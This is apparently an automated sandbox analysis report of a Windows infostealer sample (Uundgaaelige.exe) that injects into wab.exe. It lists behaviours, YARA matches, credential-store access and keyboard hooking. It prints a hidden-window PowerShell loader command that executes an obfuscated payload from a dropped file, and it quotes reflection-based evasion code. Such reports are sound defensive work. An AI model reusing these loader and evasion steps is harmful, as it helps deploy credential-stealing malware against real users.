              Source: powershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
              Source: wab.exe, 0000000C.00000002.216343644747.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216862609126.0000000002E02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168892924.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 0000000C.00000002.216343644747.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216862609126.0000000002E02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168892924.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 0000000C.00000003.216342776684.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.216343943505.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216863019101.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.216861546047.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.217168034841.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217169472479.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
              Source: wab.exe, 0000000F.00000002.216862609126.0000000002E02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168892924.0000000002E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Code function: 4_2_004052FE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match File source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 8740, type: MEMORYSTR
              Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe (dropped file)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 6%
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00401806 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004016FD NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Code function: 4_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 1424
              Source: Uundgaaelige.exe Static PE information: invalid certificate
              Source: Uundgaaelige.exe Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: Uundgaaelige.exe.7.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: Uundgaaelige.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@31/29@1/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Code function: 4_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Code function: 4_2_004045CA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Code function: 4_2_004020CB CoCreateInstance,MultiByteToWideChar
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
              Source: C:\Users\user\Desktop\Uundgaaelige.exe File created: C:\Users\user\AppData\Roaming\raffineredes
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:304:WilStaging_02
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8740
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-P99HFC
              Source: C:\Users\user\Desktop\Uundgaaelige.exe File created: C:\Users\user\AppData\Local\Temp\nsn1237.tmp
              Source: Uundgaaelige.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\Uundgaaelige.exe File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.216847912664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.217150396149.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 0000000C.00000003.216342309841.0000000004865000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.216344199265.0000000004865000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216863381018.00000000049C8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.217167458196.0000000004BA5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217169708585.0000000004BA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Uundgaaelige.exeVirustotal: Detection: 13%
              Source: C:\Users\user\Desktop\Uundgaaelige.exeFile read: C:\Users\user\Desktop\Uundgaaelige.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33248
              Source: unknown Process created: C:\Users\user\Desktop\Uundgaaelige.exe "C:\Users\user\Desktop\Uundgaaelige.exe"
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 1424
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: Uundgaaelige.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: qm.Core.pdb source: powershell.exe, 00000007.00000002.216298003587.0000000008A9C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000007.00000002.216298003587.0000000008A9C000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match File source: 00000007.00000002.216299419557.0000000009A31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Chimbley $Histolaborantomlrken $Catechizing), (Headwark @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Utjets = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Recolors)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Admiralsuniform, $false).DefineType($Kjortelen,
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 12_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_04D92DCD push ebx; ret 7_2_04D92DEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_04D9EAD4 pushfd ; ret 7_2_04D9EAE1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_04D9EAFD pushfd ; ret 7_2_04D9EAE1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_08E31A8B pushfd ; retn 089Eh 7_2_08E31E29
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_08E84BF8 push ebp; ret 7_2_08E84BE8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_08E84BCF push ebp; ret 7_2_08E84BE8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_08E819C1 push ebp; ret 7_2_08E819C2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_08E80D2E push esp; retf 7_2_08E80D2F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_08E80B3A push eax; iretd 7_2_08E80B3B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0044693D push ecx; ret 12_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00451D54 push eax; ret 12_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00451D34 push eax; ret 13_2_00451D41
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00444E71 push ecx; ret 13_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414060 push eax; ret 14_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414060 push eax; ret 14_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414039 push ecx; ret 14_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Users\user\Desktop\Uundgaaelige.exe File created: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe
              Source: C:\Users\user\Desktop\Uundgaaelige.exe File created: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dll
              Source: C:\Users\user\Desktop\Uundgaaelige.exe File created: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 13_2_004047CB
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 51CD2C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9792
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 9368
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1740
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dll
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dll
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.5 %
